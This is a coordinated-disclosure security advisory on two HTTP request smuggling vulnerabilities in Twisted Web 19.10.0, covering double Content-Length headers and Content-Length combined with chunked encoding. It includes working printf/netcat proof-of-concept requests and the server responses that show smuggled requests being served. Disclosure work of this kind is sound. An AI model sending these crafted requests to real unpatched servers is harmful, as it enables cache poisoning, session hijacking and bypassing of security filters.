ADVISORY SUMMARY

The following document describes identified vulnerabilities in the Twisted application version 19.10.0.

Impact

Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.

In this case, risk is highly contextual, it depends where and why Twisted is deployed in a given environment. The impact will vary depending on the business purpose of the service designed with Twisted.



For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:

Risk Level

High

Affected Vendor

Product Vendor Product Name Affected Version Twisted Matrix Labs Twisted 19.10.0

Product Description

Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.

Vulnerabilities List:

One vulnerability was identified within the Twisted application:

Solution

Update to version 20.3.0rc1.

Credits

Timeline

Initial Discovery: 12/05/2019 Contact with vendor: 12/09/2019 Vendor acknowledged vulnerabilities: 12/09/2019 Touch-base regarding disclosure; vendor optimistic of 3/9 patch deadline: 02/24/2020 Following up on patch status: 03/03/2020 Shared assigned CVE IDs with Twisted team: 03/04/2020 Coordinated full-disclosure/release timeline: 3/06/2020 Vendor released patched version 20.3.0rc1 : 3/09/2020 Vulnerabilities publicly disclosed: 03/11/2020

Jake Miller, Security Associate, Bishop Fox - jmiller@bishopfox.com

This vulnerability is described in the following sections.

VULNERABILITY

HTTP REQUEST SPLITTING

Two HTTP request splitting (AKA HTTP request smuggling) vulnerabilities were identified in the latest version of Twisted Web. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.

To demonstrate the vulnerabilities, printf and netcat command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using twistd web --path . --port tcp:<port> (Twisted Framework Python apps that use twistd.web are also affected).





CVE ID Security Risk Impact Access Vector CVE-2020-10108 High HTTP Request Splitting Remote, Other

Instance #1

Double Content-Length Headers

When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero, it caused Twisted Web to interpret the request body as a pipelined request.

According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response.



Request





printf 'GET /doesnotexist HTTP/1.1\r

'\

'Content-Length: 56\r

'\

'Content-Length: 0\r

'\

'Host: test.example.com\r

'\

'\r

'\

'GET /?opfdii=k58inf HTTP/1.1\r

'\

'Host: test.example.com\r

'\

'\r

' | nc 127.0.0.1 <port>

Response





HTTP/1.1 404 Not Found

Server: TwistedWeb/19.10.0

Date: Mon, 09 Dec 2019 17:02:45 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 145





<html>

<head><title>404 - No Such Resource</title></head>

<body>

<h1>No Such Resource</h1>

<p>File not found.</p>

</body>

</html>

HTTP/1.1 200 OK

Server: TwistedWeb/19.10.0

Date: Mon, 09 Dec 2019 17:02:45 GMT

Accept-Ranges: bytes

Content-Length: 6

Content-Type: text/html

Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT



Hello



As shown above, both the /doesnotexist and the smuggled request to the base path [/] were successfully resolved.





CVE ID Security Risk Impact Access Vector CVE-2020-10109 High HTTP Request Splitting Remote, Other

Instance #2

Differing Content-Length/Chunked Encoding

When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request.

According to RFC 7230 Section 3.3.3#3, if a message with both content-length and chunked encoding is accepted, transfer-encoding overrides the content-length.





Request





printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r

'\

'Transfer-Encoding: chunked\r

'\

'Content-Length: 4\r

'\

'Content-Type: application/x-www-form-urlencoded\r

'\

'Host: test.example.com\r

'\

'\r

'\

'33\r

'\

'GET /?ab8c4i=deg3if HTTP/1.1\r

'\

'Content-Length: 5\r

'\

'Host: test.example.com\r

'\

'\r

'\

'\r

'\

'0\r

'\

'\r

' | nc 127.0.0.1 <port>



Response





HTTP/1.1 200 OK

Server: TwistedWeb/19.10.0

Date: Mon, 09 Dec 2019 17:04:19 GMT

Accept-Ranges: bytes

Content-Length: 6

Content-Type: text/html

Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT



Hello

HTTP/1.1 200 OK

Server: TwistedWeb/19.10.0

Date: Mon, 09 Dec 2019 17:04:19 GMT

Accept-Ranges: bytes

Content-Length: 6

Content-Type: text/html

Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT



Hello



As shown above, smuggled requests were interpreted by the Twisted server. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.